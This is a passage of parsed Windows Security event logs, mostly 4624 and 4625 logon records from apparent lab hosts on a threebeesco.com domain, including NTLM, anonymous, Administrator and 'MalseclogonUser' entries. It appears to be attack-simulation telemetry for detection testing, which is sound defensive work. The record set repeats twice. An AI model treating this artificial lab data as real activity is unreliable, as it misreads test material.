01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-84104 + 02694W-WIN10$ + THREEBEESCO.COM + 0x567343 + 3 + Kerberos + Kerberos + - + 429CA5A3-EDFC-5657-17C3-C050C7B047F4 + - + - + 0 + 0x0 + - + 172.16.66.25 + 50250 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 329918 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1bc4 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + MalseclogonUser + MalseclogonDomain + %%1843 + 0x0 + %%1842 + +" +2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 329918 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1bc4 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + MalseclogonUser + MalseclogonDomain + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768628 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x32a0d3 + 3 + Kerberos + Kerberos + - + 6747BCF0-DBAA-F21C-878B-EB339B03FA80 + - + - + 0 + 0x0 + - + ::1 + 50441 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768627 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x329baa + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50443 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768622 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x320935 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50438 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768621 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff89 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768620 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff6e + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768619 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31fb1a + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50437 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768618 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31daf6 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50436 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137225 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd964 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd8f6 + %%1843 + +" +2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137224 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd8f6 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd964 + %%1842 + +" +2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137223 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x25c + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4625 + 0 + 0 + 12544 + 0 + 0x8010000000000000 + + + 137222 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-0-0 + IEUser + MSEDGEWIN10 + 0xc000006d + %%2313 + 0xc000006a + 2 + Chrome + Negotiate + MSEDGEWIN10 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + +" +2022-02-16T14:37:25.097894+04:00,1645007845.097894,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988550 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x568d99 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64229 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.920925+04:00,1645007842.920925,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988547 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56874b + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64227 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.906213+04:00,1645007842.906213,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988544 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x5686d9 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64226 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.521180+04:00,1645007840.52118,4624,samir,3B,3,NtLmSsp,-,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988535 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567758 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.450532+04:00,1645007840.450532,4624,samir,3B,3,NtLmSsp,172.16.66.25,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988529 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567515 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.25 + 50251 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.725428+04:00,1645007839.725428,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988525 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56738f + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64223 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.637257+04:00,1645007839.637257,4624,02694W-WIN10$,THREEBEESCO.COM,3,Kerberos,172.16.66.25,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988522 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-84104 + 02694W-WIN10$ + THREEBEESCO.COM + 0x567343 + 3 + Kerberos + Kerberos + - + 429CA5A3-EDFC-5657-17C3-C050C7B047F4 + - + - + 0 + 0x0 + - + 172.16.66.25 + 50250 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:17.200140+04:00,1600879817.20014,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772611 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x1137987 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 50107 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:17.194314+04:00,1600879817.194314,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772609 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-5-18 + 01566S-WIN16-IR$ + 3B + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x244 + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:16.702981+04:00,1600879816.702981,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772607 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x1136e95 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 50106 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 329918 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1bc4 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + MalseclogonUser + MalseclogonDomain + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768628 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x32a0d3 + 3 + Kerberos + Kerberos + - + 6747BCF0-DBAA-F21C-878B-EB339B03FA80 + - + - + 0 + 0x0 + - + ::1 + 50441 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768627 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x329baa + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50443 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768622 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x320935 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50438 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768621 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff89 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768620 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff6e + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768619 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31fb1a + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50437 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768618 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31daf6 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50436 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137225 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd964 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd8f6 + %%1843 + +" +2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137224 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd8f6 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd964 + %%1842 + +" +2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137223 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x25c + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4625 + 0 + 0 + 12544 + 0 + 0x8010000000000000 + + + 137222 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-0-0 + IEUser + MSEDGEWIN10 + 0xc000006d + %%2313 + 0xc000006a + 2 + Chrome + Negotiate + MSEDGEWIN10 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + +" +2022-02-16T14:37:25.097894+04:00,1645007845.097894,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988550 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x568d99 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64229 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.920925+04:00,1645007842.920925,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988547 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56874b + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64227 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.906213+04:00,1645007842.906213,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988544 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x5686d9 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64226 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.521180+04:00,1645007840.52118,4624,samir,3B,3,NtLmSsp,-,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988535 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567758 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.450532+04:00,1645007840.450532,4624,samir,3B,3,NtLmSsp,172.16.66.25,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988529 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567515 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.25 + 50251 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.725428+04:00,1645007839.725428,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988525 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56738f + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64223 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.637257+04:00,1645007839.637257,4624,02694W-WIN10$,THREEBEESCO.COM,3,Kerberos,172.16.66.25,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988522 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-84104 + 02694W-WIN10$ + THREEBEESCO.COM + 0x567343 + 3 + Kerberos + Kerberos + - + 429CA5A3-EDFC-5657-17C3-C050C7B047F4 + - + - + 0 + 0x0 + - + 172.16.66.25 + 50250 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:17.200140+04:00,1600879817.20014,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772611 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x1137987 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 50107 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:17.194314+04:00,1600879817.194314,4624,SYSTEM,NT 